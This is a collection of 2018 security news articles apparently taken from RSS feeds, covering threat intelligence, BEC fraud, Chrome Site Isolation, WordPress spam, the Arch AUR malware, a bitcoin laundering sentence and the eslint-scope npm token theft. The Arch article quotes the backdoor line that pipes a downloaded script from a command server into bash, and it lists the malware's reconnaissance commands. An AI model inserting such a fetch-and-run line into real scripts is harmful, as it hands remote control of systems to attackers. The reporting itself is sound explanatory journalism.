STE WILLIAMS

To keep an organization safe, you must think about the entire IT ecosystem.

The ever-expanding range and diversity of cyber threats make it difficult for organizations to prioritize their offensive and defensive strategies against attackers. From malware, ransomware, and other attacks coming from the outside, to insider threats and system vulnerabilities from within, today’s expanded attack surfaces cut across the whole enterprise landscape — and that means an enterprise’s threat intelligence strategy must address the entire IT ecosystem.

To be effective, threat intelligence must be proactive, comprehensive, and done in a way that doesn’t inadvertently create more risk. Unfortunately, as a recent Ponemon survey illustrates, most organizations fall short of this goal — tripped up by a range of challenges, including a lack of expertise and overwhelming volumes of data. Improved threat intelligence comes from improving the strategy, techniques, and tools employed by enterprises to probe their networks for weakness and shore up defenses and resiliency.

A “Dirty Internet” of Threats and Vulnerabilities
The digital universe is vast, but it’s also “dirty” in the sense of data seeping across perimeters and network boundaries. This “digital exhaust” — evidence of visits, searches, purchases, and other behaviors that users leave behind on the Internet — is growing quickly and is grist for hackers looking to penetrate systems and databases.

Unfortunately, one of the most valuable forms of digital exhaust comes as a by-product of poorly designed threat intelligence. Too often, threat intelligence involves tools and processes that, while designed to monitor the perimeter and internal systems for threats, unwittingly leave behind artifacts of that troubleshooting activity that malicious actors can ultimately use against the organization. 

This “fly on the wall” process of observation could even uncover specifics about who is conducting the threat intelligence and what devices they’re using. Adding to the challenge, today’s threat actors are sophisticated enough that firewalls, VPNs, proxy servers, and other traditional secure access solutions are too weak to stop them.

What’s needed is a new approach to operating on the Internet that makes use of managed attribution techniques, including data obfuscation, identity and location masking, and multiple levels of encryption and authentication to reduce and virtually eliminate the attack surface. In other words, an ideal threat intelligence strategy would not only protect data from breaches but also protect data in the event of a breach. Both goals can be achieved.

Anonymity and Managed Attribution
Anonymity is an important component. This is where technology is used to conceal your identity, location, and details about the device you are using as you conduct threat intelligence. Managed attribution takes things a step further, not only hiding your identity and location, but actually making it appear as if you are someone else operating from somewhere else — a soccer parent in Manitoba, say, instead of a systems analyst in Arlington, Virginia.

Further, organizations need to manage both the technical and personal side of user identities. Technical attribution might involve a virtual desktop that’s clean and separate from the data on an actual device; there are even systems that frequently and randomly swap IP addresses at the point of presence. Personal attribution, meanwhile, involves multiple profiles that can be swapped out as quickly and easily as signing in and out of the platform. Suddenly, the soccer parent in Manitoba becomes a street merchant in Madrid. 

Securing Data for a Secure Future
Ultimately, the entire network architecture should be cloaked from the view of threat actors looking to seize access and advantage. This involves obfuscating network operations through a cloud of encryption and IP hopping capabilities that mask user and organizational data through a series of complex pathways, directory nodes, and networking hops that scramble the meaning and context around data and its users.

While the attack surface can’t be eliminated entirely, obfuscation can turn that surface into a meaningless or unappealing target to potential threat actors. It’s even possible to obfuscate entire pieces of infrastructure — email systems, application servers, and storage facilities — and this can all be designed and implemented in the cloud.

The innovation around threat intelligence is constant, and for good reason. It’s not just that organizations need to protect assets today; they also need to be prepared (as much as possible) for tomorrow’s unknown and unknowable threats. Effective threat intelligence can also help organizations meet regulations such as the EU’s General Data Protection Regulation as well as existing standards that require them to employ technical and organizational measures that ensure an appropriate level of security.

For all these reasons, improved threat intelligence can and should be a priority for any organization or government agency. The right strategies, tools, and partners can lead to a higher level of security that keeps both cyber-threat teams and organizational data safe and secure from evolving and ever-growing cyber threats.

Related Content:

• 6 Steps for Sharing Threat Intelligence
• 4 Basic Principles to Help Keep Hackers Out
• Why Sharing Intelligence Makes Everyone Safer
• Is Threat Intelligence Garbage?

Learn from the industry’s most knowledgeable CISOs and IT security experts in a setting that is conducive to interaction and conversation. Register before July 27 and save $700! Click for more info. 

Tom Badders is the Senior Product Manager for Secure Mobility Products and Services at Telos Corporation, a leading provider of continuous security solutions and services for the world’s most security-conscious agencies and organizations. Leveraging over 40 years of … View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/how-to-structure-an-enterprise-wide-threat-intelligence-strategy/a/d-id/1332244?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

There were more than 78K business email account (BEC) and email account compromise (EAC) scam incidents worldwide between October 2013 and May 2018.

New FBI data shows that business email compromise (BEC) and email account compromise (EAC) scam losses worldwide spiked 136% from December 2016 to May 2018.

There were 78,617 BEC/EAC incidents reported between October 2013 and May 2018, resulting in $12 billion in losses. Of those incidents, 41,058 were in the US, resulting in $2.9 billion in losses. China and Hong Kong banks led the locations for receipt of fraudulent funds, while the UK, Mexico, and Turkey are emerging regions, the FBI report shows.

“The scam may not always be associated with a request for transfer of funds. A variation of the scam involves compromising legitimate business e-mail accounts and requesting Personally Identifiable Information (PII) or Wage and Tax Statement (W-2) forms for employees,” the FBI said in its public service announcement reporting the latest statistics.

The real estate industry is the new hot target: from 2015 to 2017, there was an increase of 1,100% of BEC/EAC victims in that sector.

Read more here. 

 

 

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/fbi-email-account-compromise-losses-reach-$12b-/d/d-id/1332294?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Google is touting the benefits of a recently rolled out browser security feature called Site Isolation.

Site Isolation has been gradually introduced to users of the Chrome browser over several months, and now Google has officially unveiled this important piece of tech.

With Site Isolation is enabled, Chrome runs a different browser process for each internet domain. Google initially described Site Isolation as an “additional security boundary between websites,” preventing malicious webpages in a tab from messing with or spying on tabs and iframes displaying pages from other domains.

Rather than solely defending against cross-site scripting attacks, the technology is now positioned as a necessary defence against infamous data-leaking Spectre CPU vulnerabilities, as a blog post by Google explained this week:

Speculative execution side-channel attacks like Spectre are a newly discovered security risk for web browsers. A website could use such attacks to steal data or login information from other websites that are open in the browser. To better mitigate these attacks, we’re excited to announce that Chrome 67 has enabled a security feature called Site Isolation on Windows, Mac, Linux, and Chrome OS.

Site Isolation has been optionally available as an experimental enterprise policy since Chrome 63, but many known issues have been resolved since then, making it practical to enable by default for all desktop Chrome users.

In other words, on Windows, macOS, Linux, and Chrome OS devices, Chrome uses the security boundaries provided by the operating system to ringfence each domain into its own browser process. Threads used to render the page in one process cannot interfere with nor snoop on, via speculative execution or crafty JavaScript, other sites, preventing malicious pages from lifting passwords and other secrets.

Site Isolation was enabled by default on desktops with the release of Chrome 67, at the end of May, as previously reported.

In its blog post, Google goes on to explain how the tech works, adding that it had been working on Site Isolation even before Spectre appeared in January:

When Site Isolation is enabled, each renderer process contains documents from at most one site. This means all navigations to cross-site documents cause a tab to switch processes. It also means all cross-site iframes are put into a different process than their parent frame, using “out-of-process iframes.”

Splitting a single page across multiple processes is a major change to how Chrome works, and the Chrome Security team has been pursuing this for several years, independently of Spectre.

Site Isolation changes Chrome’s behaviour under the hood, but this “generally shouldn’t cause visible changes for most users or web developers,” according to Google. Although the vast majority (99 per cent) of Chrome users are being moved onto Site Isolation by default, Google is keeping one in a 100 on a temporary holdback to “monitor and improve performance.”

With Site Isolation, a single page may now be split across multiple renderer processes, preventing bad sites from snooping on legit ones … Source: Google

Spectre mitigations in software have being known to impair performance of applications, but it doesn’t seem the Chocolate Factory fears any major issues. The long soft launch of the technology provided plenty of time to iron out any wrinkles, after all.

Google is investigating how to extend Site Isolation coverage to Chrome for Android, where there are additional known issues. Ahead of prime time, experimental enterprise policies for enabling Site Isolation will be available in Chrome 68 for Android. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/12/chrome_site_isolation/

Security Pro File: Web app security pioneer dishes on his teenage security career, his love of electric scooters, Ace Ventura – and a new baby food business venture with his wife and famed chef, Kathy Fang.

A garbled pager message was how Caleb Sima learned that he had landed his first interview for a security position. It was the mid-’90s, before online job sites – when job boards were all the rage and pagers, not iPhones, served as personal mobile communicators.

Sima, then a teenager, had spotted a job opening for a security engineer at a company called SecurityFirst in Atlanta. “It was super-unusual. Nobody had positions called ‘security'” then, he recalls. Sima’s pager had broken, so the callback number didn’t display fully on the device. As a result, he had to painstakingly dig through his call logs to find the phone number to respond and set up the interview.

He got the job, where his main responsibility was firewall management for the company’s data center. It was there he got his hands on the intrusion detection system (IDS) tool RealSecure by Internet Security Systems (ISS). “I was constantly finding ways to bypass it. I was on the phone with ISS all the time with their engineering team,” he recalls.

ISS (now part of IBM) eventually hired Sima, where his first position was on the quality assurance team. A few months later, he was recruited to ISS’s elite X-Force white-hat hacking team. Of note, he was only 17 years old. Sima, who had dropped out of high school during the Internet boom, says ISS became his real-world school. “There were guys sitting in a room reverse-engineering software, and I was writing code for signatures, finding exploits, and all of the rest of that stuff,” he says.

This was where the renowned pioneer of Web application security first started finding security holes in Web applications. Web pen testing wasn’t really a thing yet in the mid- to late-’90s, so Sima and his colleagues were charting new territory.

“I started finding SQL injection before they called it [that],” Sima says.

In one of his first pen-test engagements, he was able to gain admin access to the Web server – with less than a day of hacking. “There was a login form only, nothing else, so that was the only thing I could target,” Sima recalls.

But he hit the mother lode after noticing the Web page source included a thread of comments between the Web admin and developer that showed the admin page information. “I was like, ‘Holy crap, who puts that stuff in Web pages?” he recalls. So he got admin access and uploaded his own scripts to the server.

During a client pen-testing engagement for ISS at BellSouth, Sima demonstrated to the head of security how an attacker could hack into the company’s website and grab customer information, such as billing. BellSouth was sold and wanted Sima to create a tool. Sima recalls the manager’s reaction: “‘Dude, you need to make a product that automates that stuff; I would buy it.'”  

With the blessing of ISS, Sima built the Web testing tool as a freelance project for the former regional telco. He made $20,000.

Sima took the basic automated scripts he had and then rolled them into an automated hacking tool that ultimately evolved into his first commercial product, WebInspect, and the core of his first startup, SPI Dynamics. “At first it was just me working on this thing with scripts and doing consulting on my own to bring in cash,” he says of his startup’s early days. He later brought in his co-founders, Brian Christian and Wade Malone, to officially launch the company.

“No one would give us money” at first, he says. The team worked out of a dingy, one-room office located behind a strip club in downtown Atlanta. “We would find needles, bullet-shell casings in the parking lot,” he says, and they’d see cops on stakeouts there during the day. “We couldn’t pay the bills at times.” 

But by 2002, SPI Dynamics finally began to take off and raise capital. In 2007 the company was acquired by HP, which had been competing with IBM for a Web app-scanning tool purchase. Sima became chief technologist for HP’s Application Security Center, where he headed up its security solutions and led development of a cloud-based security service.

His flair for demonstrating website vulnerabilities shocked a few HP software employees during a presentation he gave for them. Sima showed how he could hack into the HP Expense and HR system via a Web application. “I could get all the execs’ comp; I was able to [theoretically] fire or give them raises,” he says. Of course, “I blacked out the comp information,” he adds, and had received permission from management beforehand for the demo he hoped would help hit home the importance of Web security.

Sima once even hacked into his dentist office’s Internet kiosk via a cross-site scripting (XSS) flaw to show how he could pivot into sensitive systems. “I pointed out to my dentist office that I was able to get access to the patient records through their kiosk via XSS,” he told Dark Reading in a 2007 interview.

After three years at HP, Sima departed for code analysis firm Armorize and, later, CodeSecure, where he served as CEO for over a year.

Enterprise Bug
All that was missing from Sima’s resume was an enterprise gig. That came in 2016, when he joined Capital One as its managing vice president of cybersecurity. Frustrated that there were too many security startups flooding the market and spreading hype, he saw the Capital One position as an opportunity to get up close and dig into the actual problems organizations were facing with security. Vendors don’t typically know the whole picture of security challenges companies face, he says.

Among the projects Sima spearheaded at the bank was a vendor relationship program aimed at streamlining and improving communications with security vendors pitching their wares. Not surprisingly, large organizations such as Capital One get inundated with vendor pitches and contacts. Among the requirements of the project: that vendors in their initial outreach give an elevator pitch about their products and the problems they solve, as well as a video link to a demo. Then the bank would respond quickly regarding whether to set up a meeting.

It provided the firm with basic “rules of engagement” for vendors: “If you want to pitch to us, here’s what I need from you,” Sima explains.

As part of the process, Sima also helped set up at Capital One a “cyber test kitchen,” a designated test lab for the proof-of-concept phase of testing vendor products by the security teams assigned to certain vendor products.

Sima left Capital One last November. “I was traveling two weeks out of the month” between his home in San Francisco and the company’s home offices in the Washington, D.C., area, he says. “My daughter was born, and I said, ‘I gotta call it.'”

In the Real Kitchen
Sima has since moved from the cyber test kitchen to a side business out of his real kitchen (not to mention he completed Harvard Biz School’s Program for Leadership Development). He’s currently teaming with his wife – famed chef Kathy Fang – to launch a new baby-food business that evolved out of Fang’s personal experience of making her own baby food for their eight-month-old daughter Ava. Fang, head chef and owner of Fang restaurant in San Francisco, had been making her own baby food for Ava for a healthier and broader palate option than commercial baby foods. “We started like many parents, buying our vegetables … blending and turning them into puree that you would freeze and melt and feed to your baby,” Sima says.

After watching a chef on a cooking show freeze-dry a ramen broth that maintained both the taste and nutrients, Fang, who also holds a champion title on the Food Network’s popular “Chopped” series, decided to test the process out on her homemade baby food. It worked, and the couple started carrying the freeze-dried powder food with them on outings and social events with Ava. Their friends began asking Fang if they could buy the freeze-dried meals, which are prepared with warm water or breast milk.

“Now it’s in demand,” Sima says of the baby food, which has names like “My Sweet Pea” (sugar snap peas, baby spinach, and baby kale), “Goldilocks Chicken Porridge” (chicken breast broth, koshihikari rice), and “Smashing Pumpkins” (kabocha, pumpkin, and carrots). The couple is in the process of setting up the new side business.

Even for a veteran entrepreneur like Sima, doing so has been a whole new experience, including meeting with a food lawyer (yes, there is such thing). “What are the laws with baby food, getting a co-packer, what it looks like to scale” and how to get licenses are some of the legal issues, he says.

He’s also helping security startups. Sima, CEO and co-founder of Bluebox Security, currently serves on the board of pen-testing-as-a-service firm Cobalt.io. In addition, he is working with venture capital firms as well as what he describes as an “offensive wireless gig” for a client using a product he built “that’s not quite public yet.”

Sima has some unfinished business in enterprise security, though. “I want to go back to the enterprise side again. I feel like there’s more for me to learn,” he says.

PERSONALITY BYTES

First hack: Figuring out how to run the first version of Doom on only 2MB of RAM by not loading the audio driver.

What Sima’s co-workers don’t know about him that would surprise them: I have the entire dialogue for the first “Ace Ventura” movie memorized.

Security must-haves: Single sign-on and the sentry from the first “Robocop” movie.

Fun fact: I could walk into a kitchen at a Long John Silver’s today and immediately be their best cook.

On the state of WebAppSec: I don’t think it’s evolved that much at all.

Quotable: I was never a foodie, and I’m still not a foodie.

Comfort food: Portuguese sausage, scrambled eggs, and rice-spam musubi.

In his music playlist right now: Tool, Korn, Disturbed, Linkin Park

Ride: Electric scooters until SF decided to ban them.

RR: Playing with my daughter!

Next career: Bartender at a bar on the beach.

 

 

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/application-security/whats-cooking-with-caleb-sima/d/d-id/1332288?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Spammers using a ‘spray pray’ approach to post comments on WordPress powered blogs, forums, says Imperva.

WordPress-powered websites are being targeted in a comment spam campaign designed to get users to click on links to sites offering betting services on the 2018 FIFA World Cup games.

Security vendor Imperva recently observed a botnet spewing out meaningless text messages generated from a template to comments sections in blogs, news articles, and other sites that allow people to comment.

The spambot has been attempting to post comments to the same Uniform Resource Identifier (URI) across different WordPress sites indiscriminately and without regard for whether the site is vulnerable or even has a comments section.

The template that is being used to generate the messages has been around since at least 2013 and essentially gives spammers an automated way to craft slightly different versions of the same message. For example, one version of a message generated via the template might begin with ‘I have been surfing online more than 2 hours today, yet I never found an interesting article like yours’. Another version might say, ‘I have been browsing online more than three hours today, yet I never found an interesting article like yours.’

“Our analysis found that the top 10 links advertised by the botnet lead to World Cup betting sites,” Imperva said in its report on the campaign. “Interestingly, eight of the top advertised sites contained links to the same betting site, hinting that they might be connected in a way.”

The botnet itself is comprised of some 1,200 unique IPs, which by today’s measures is not especially large. In many cases that Imperva analyzed, the botnet has been using URL-shortening, URL redirection, and other techniques to try and hide the destination of advertised links in its spam messages.

In the weeks leading up to the World Cup, the botnet was being used in remote code execution attacks and other attacks on WordPress sites. But once the games started, the botnet’s main activity shifted to comment spam. This suggests that the botnet is available for hire and that the betting site being advertised via the current spam campaign are the ones paying for it, says Jonathan Azaria, security researcher at Imperva.

“Either the owners, or someone that benefits directly from the increased traffic via an affiliate program, for example,” looks to be behind the campaign he says.

Comment spam — like other forms of spam — has been around for a long time, but continues to be popular among threat actors because of how effective they are in delivering marketing messages or links to websites via comments on online forums.

WordPress itself has called comment spam a “fact of life” for anyone with a blog and has offered numerous tips and links on how to mitigate the issue.

The most common approaches have been to blacklist IPs sending spams messages and also the URLs that they advertise. Plug-ins are readily available for vetting comment submissions and ensuring comments and posts are not being generated by a spambot.

“Numerous solutions exist for comment spam,” Azaria says. “In some cases, a simple plugin will suffice. In others, a more complex solution is required such as a WAF, Captcha, [or a] bot detection and classification [tool],” he says.

Related Content:

• Office 365 Missed 34,000 Phishing Emails Last Month
• Facebook Spam Botnet Promises ‘Likes’ for Access Tokens
• New Spam Campaign Literally Doubles Down on Ransomware
• 8 Security Tips for a Hassle-Free Summer Vacation

 

 

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/endpoint/wordpress-sites-targeted-in-world-cup-themed-spam-scam/d/d-id/1332291?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Another day, another Linux community with malware woes.

Last time it was Gentoo, a hard-core, source-based Linux distribution that is popular with techies who like to spend hours tweaking their entire operating sytem and rebuilding all their software from scratch to wring a few percentage points of performance out of it.

That sort of thing isn’t for everyone, but it’s harmless fun and it does give you loads of insight into how everything fits together.

That sets it apart from distros such as ElementaryOS and Mint, which rival and even exceed Windows and macOS for ease of installation and use, but don’t leave you with much of a sense of how it all actually works.

This time, the malware poisoning happened to Arch Linux, another distro we’d characterise as hard-core, though very much more widely used than Gentoo.

Three downloadable software packages in the AUR, short for Arch User Respository, were found to have been rebuilt so they contained what you might (perhaps slightly unkindly) refer to as zombie downloader robot overlord malware.

Bots or zombies are malware programs that call home to fetch instructions from the crooks on what to do next.

The hacked packages were: acroread 9.5.5-8, balz 1.20-3 and minergate 8.1-2; they’ve all apparently been restored to their pre-infection state.

What happened?

Simply put, the packages had one line added – on Linux, the core functionality of a bot can be trivially condensed into a single line:

   curl -s https://[redacted]/~x|bash -

This single line of code, part of an installation script written in the Bash language, fetches a text file from a command-and-control (CC) server and runs it as a script in its own right.

The command curl is a program that fetches a web page using HTTP or HTTPS. The pipe character (|) is Unix shorthand for “use the output of the command on the left directly as the input of the command on the right”. And bash - says to read and use the data that’s coming as input, denoted by the dash (-) directly as a script program. The pipe character therefore means you don’t need to run one command to fetch a file and then tell the next command to read the same file back in – the data is, literally and figuratively, piped between the two programs via memory. Finally, the ampersand () means to run the whole thing in the background so that it’s as good as invisible.

This means that the attacker can change the behaviour of the malware at any time by altering the commands stored in the file ~x on the CC server.

At present, the ~x command sets up a regular background task- the Linux equivalent of a Windows service – that repeatedly runs a second script called u.sh that’s downloaded from the web page ~u on the same CC server.

The u.sh file tries to extract some basic data about the infected system , and to upload it to a Pastebin account.

The system data that the u.sh malware is interested in comes from the following Arch commands:

 echo ${MACHINE_ID}    -- this computer's unique ID (randomly generated at install time)
 date '+%s'            -- the current date and time
 uname -a              -- details about the Linux version that's loaded
 id                    -- details about the user account running the script
 lscpu                 -- technical details about the system processor chip
 pacman -Qeq           -- the software you've installed (Qe means "query explicit")
 pacman -Qdq           -- any extra software needed to go with it (Qd means "query dependencies")
 systemctl list-units  -- all the system services

Fortunately, the part of the script that does the data exfiltration contains a programming error, so the upload never happens.

The Arch reaction

Arch is well-respected for the enormous quantity of community documentation it has published in recent years – users of many other distros often find themselves referring to Arch Linux documentation pages to learn what they need to know.

Where Arch has been – how can we say this? – a little less likable, is the extent to which the distro’s culture mirrors the aggressive “alpha techiness” of the King of Linux, Linus Torvalds himself – a man who is on record for numerous intolerant, insulting and frequently purposeless outbursts aimed at those he thinks are in the way.

So we weren’t entirely surprised to see this online response from one of the luminati of the Arch community, dismissing the malware with a petulant “meh”:

This would be a warning for what exactly? That orphaned packages can be adopted by anyone? That we have a big bold disclaimer on the front page of the AUR clearly stating that you should use any content at your own risk?

This thread is attracting way more attention than warranted. I’m surprised that this type of silly package takeover and malware introduction doesn’t happen more often.

To be fair to the Arch team, the hacked packages were found on AUR, which is the Arch User Repository, which isn’t vouched for or vetted by the Arch maintainers – in the same sort of way that none of the off-market Android forums are vouched for by Google.

Nevertheless, the AUR site is logoed up and branded as the Arch User Repository, not merely the User Repository, so a bit less attitude from the Arch team wouldn’t hurt.

What to do?

You might not like Arch’s attitude – and if you don’t, you’re probably using a different distro anyway – but the warning on the community-operated Arch User Repository does, in fact, say it all, even if we’d sneak a hyphen between “user” and “produced”:

DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.

If you don’t trust it, don’t install it.

---

Note. We don’t expect this thing to be a problem in real life, but Sophos products will nevertheless detect the abovementioned scripts as Linux/BckDr-RVR, and block the CC URLs used to “feed” the attack. (If you’d like to try Sophos Anti-Virus for Linux, by the way, it’s 100% free both at work and at home.)

Follow @NakedSecurity
Follow @duckblog

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/aaF7oCf1Ax8/

Anacoluthon – we love it!

(That’s where a sentence has some sort of grammatical inconsistency or ambiguity that jars you into thoughtfulness, then I went for a walk by the River Thames.)

We find anacoluthon as fascinating as cryptocurrency shenanigans, so we were doubly intrigued by a recent Ars Technica headline – Woman who once bought bitcoins for cash in paper bags sent to prison.

We were dying untangle the ambiguity here – did the bags contain the cash, or did the bags contain the bitcoins?

Were the bags sent to prison, or the woman?

Was she buying cash in paper bags with bitcoins, or bitcoins in paper bags with cash, or were both parts of the transaction in bags?

If the cash was in paper bags, were they brown bags, as they would be in a metaphor, or at lunch, and if not, why not?

Heck, these days, if someone actually buys and sells bitcoins in person for real, hard cash, don’t they deserve some sort of medal?

When you think of how often cryptocurrency buyers and sellers have gone through online exchanges and ended up out of pocket following some sort of cybersecurity catastrophe, real or imaginary, aren’t cash buyers to be applauded?

So many questions, and we hadn’t got past the headline yet!

We found the full story in what’s called the Sentencing Position document filed by the United States of America in its federal court case against Theresa Tetley, aka the “Bitcoin Maven”.

The Bitcoin Maven (a maven, in case you are wondering, is an expert or connoisseur) had already pleaded guilty to money laundering charges relating to bitcoins; this time she was back in court to be sentenced.

Simply put, Tetley did indeed buy bitcoins for hard cash, according to the prosecutors.

Buying bitcoins, even for hard cash, even in huge amounts, isn’t illegal, provided that you comply with the relevant laws relating to trading in cash.

And that’s where she got into trouble.

Firstly, if you do cash trades as your profession, rather than just as a hobby, you’re a “money transmitting business” and you need to register, something Tetley didn’t do.

Prosecutors pointed out that Tetley most certainly did operate as a business, given that she maintained ledgers, owned a money-counting machine “to ensure that she was always accurate”, and had paid out between $6,000,000 and $9,500,000 in cash over three years.

Six million, it seems, is a bit much for a hobby.

Secondly, if you do any individual trades involving more than $10,000 in cash, you have to declare them.

It would have been tricky for Tetley to have complied with this part of the law without incriminating herself on the first point – and prosecutors knew she had done at least three transactions over $10,000 because they’d had undercover federal agents do those deals.

According to the Sentencing Position document, a federal undercover agent identified only as UCA-2 had traded with Tetley on three occasions:

• “UCA-2 and defendant conducted a Bitcoin-for-cash transaction [in July 2016] (approximately $45,000), at a restaurant; defendant provided UCA-2 with cash (in exchange for his Bitcoin) in seven white envelopes.”
• “Defendant provided approximately $70,000 in seven white envelopes to UCA-2 [in January 2017]. Defendant continued to assure UCA-2 that she was trustworthy and reputable, and UCA-2 emphasized that he was in the business of selling narcotics.”

What about the bags?

No bags, brown or otherwise, just white envelopes!

But we didn’t have to wait long in the story:

• “Defendant and UCA-2 arranged to meet in March 2017 for a $300,000 exchange transaction. Defendant brought to the transaction two Trader Joe’s paper grocery bags. Defendant was arrested at this transaction.”

Bitcoin Maven also dealt in cash with a alleged darkweb drug dealer she knew as “Pirate Shit”, aka “David”, apparently to the tune of $6,000,000.

The prosecutors didn’t say what sort of cash discount the Bitcoin Maven demanded for her off-the-record purchases – they just noted wryly that she acted “with an intent to profit; she charged above-market rates, which presumably was profitable for her.”

For that reason, prosecutors argued that Tetley’s crimes deserved a “significant sentence” of 30 months (2.5 years) in prison, both as a deterrent and in recognition of the severity of the crimes:

Providing cash in envelopes (and in the significant amounts she did), in coffee shops and restaurants, is no way to conduct legitimate business, certainly when that volume exceeds the millions, and someone such as defendant –- a former stockbroker and real estate investor –- was certainly aware of that. Her decision to continue to proceed in this manner highlights the seriousness of the offense that warrants a custodial sentence of 30 months.

We dare say that neither the coffee shops, nor the restaurants, nor yet the envelopes, are key factors here.

If you were to put $6,000,000 in a hand-woven picnic hamper instead of stuffing it into bags or envelopes, and hand it over at the opera, instead of in a coffee shop or a restaurant, you’d still be in serious trouble.

What next?

In the end, Tetley was sent to prison for one year (technically, 366 days), given three years’ supervision after release, and fined $20,000.

She was also instructed to hand over BTC40 (currently worth about $250,000 at legitimate rates), just under $300,000 in cash and “25 assorted gold bars” that the court deemed to be the proceeds of crime.

And those paper bags?

The US Attorneys aren’t saying what colour they were, but given they were grocery bags from Trader Joe’s, we’re saying that they were, indeed, proverbially brown.

Follow @NakedSecurity
Follow @duckblog

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/w1tFFlQ6ejM/

A former Apple engineer has been hit with federal trade secrets theft charges after trying to lift Cupertino’s autonomous car tech on behalf of Alibaba.

The California Northern District Court will hear the case (PDF) of Xiaolang Zhang, an engineer who in 2015 was hired to work on the Cupertino music seller’s ultra-secretive self-driving car project. He was designing and testing circuit boards before leaving in April of this year to join an Alibaba and Foxconn-backed Chinese startup called Xiaopeng Motors.

According to prosecutors, Zhang took two circuit boards and a server as well as copies of files and information from two databases containing the details of Apple’s worst kept secret since the iPhone with the intent of moving it with him to China.

The theft was said to have taken place between April 28 and April 30, the day Zhang announced his resignation from Apple. Prosecutors believe that during that stretch, Zhang lifted both the hardware and data from Cupertino headquarters with the aim of taking the information to his new employer.

Apparently, Zhang was less than discrete in his efforts, making it fairly easy for Apple security to catch him.

“Apple’s database security team found that in the days just prior to April 30, 2018, Zhang’s Apple network activity increased exponentially compared to the prior two years of his employment,” the criminal complaint reads.

“The majority of his activity consisted of both bulk searches and targeted downloading copious pages of information from the confidential database applications.”

According to the South China Morning Post, Zhang was lifted by cops earlier this week when he attempted to fly out of San Jose Airport. Xiaopeng Motors is said to be looking to wash its hands of the matter, denying all knowledge of Zhang’s plans. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/12/fbi_apple_stealing/

An unfortunate chain reaction was averted today after miscreants tampered with a widely used JavaScript programming tool to steal other developers’ NPM login tokens.

The open-source utility eslint-scope was altered by hackers so that, when used to analyze source code, it would copy the contents of the user’s ~/.npmrc file to an outside server via HTTPS – that file would include the victim’s NPMjs.org login token.

NPM is the JavaScript world’s package manager for libraries, toolkits, and other code projects. With those tokens in hand, scumbags could have started altering other packages to further collect login tokens, insert malicious code into programs, and so on, possibly initiating a chain reaction of cyber-crime.

Although eslint-scope has more than two million weekly downloads, we’re told only a small number of people were stung by the compromised version, and had their tokens swiped. Tokens issued before 1230 UTC today have been revoked, people should change their NPM passwords and enable two-factor authentication, and an investigation is underway to discover if any NOPM packages have been vandalized via stolen credentials.

Hijacked

Version 3.7.2 of eslint-scope was pushed to NPM by miscreants who gained control of a maintainer’s account for the software: that’s the poisoned version that harvested people’s NPM login tokens. It has since been taken offline.

The credential thieves could have used the tokens to gain access to other NPM-managed projects that could, again, be used to spread more malware. NPM users download billions of packages every week.

In other words, someone lost control their account to an attacker, who then implanted malicious code in a popular tool to gain access to NPM accounts to potentially infect further packages.

This typosquatting attack on npm went undetected for 2 weeks

READ MORE

Understandably, NPM has already invalidated tokens issued before 2018-07-12 1230 UTC in an attempt to prevent the further spread of evil code. Unfortunately, the damage may have already been done. NPM said “a small number” of developers, and potentially their projects, were affected by this.

“We believe the vector for this compromise was stolen credentials from one of the authorized publishers of the eslint-scope package,” NPM said in a statement on its website.

“We recommend all package authors enable two-factor auth to protect their accounts from this kind of attack.”

The hijack is believed to have kicked off some time last night, with an eslint-scope maintainer’s account receiving a new unexpected NPM token overnight, tipping off coders to a possible security breach.

“One of our maintainers did observe that a new npm token was generated overnight (said maintainer was asleep),” explained eslint dev Kevin Partington.

Anyone who used the infected version of eslint-scope has, by now, had their NPM tokens revoked, so that part of the attack has been mitigated. They should also delete the software, and install a known good version.

NPM said it will conduct a further audit of all of its managed projects to determine just how bad the breach really was. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/12/npm_eslint/

Google is touting the benefits of a recently introduced browser security feature called Site Isolation.

Site Isolation has been gradually introduced to users of the Chrome browser over several months, but now Google has officially unveiled this important piece of tech.

When Site Isolation is enabled, Chrome runs a different browser process for each internet domain. Google initially described Site Isolation as an “additional security boundary between websites,” preventing malicious sites from messing with the code of legitimate domains.

Rather than act as an enhancement to defend against cross-site scripting attacks, the technology is now been positioned as a necessary defence against the infamous Spectre vulnerability, as a blog post from Google explains.

Speculative execution side-channel attacks like Spectre are a newly discovered security risk for web browsers. A website could use such attacks to steal data or login information from other websites that are open in the browser. To better mitigate these attacks, we’re excited to announce that Chrome 67 has enabled a security feature called Site Isolation on Windows, Mac, Linux, and Chrome OS.

Site Isolation has been optionally available as an experimental enterprise policy since Chrome 63, but many known issues have been resolved since then, making it practical to enable by default for all desktop Chrome users.

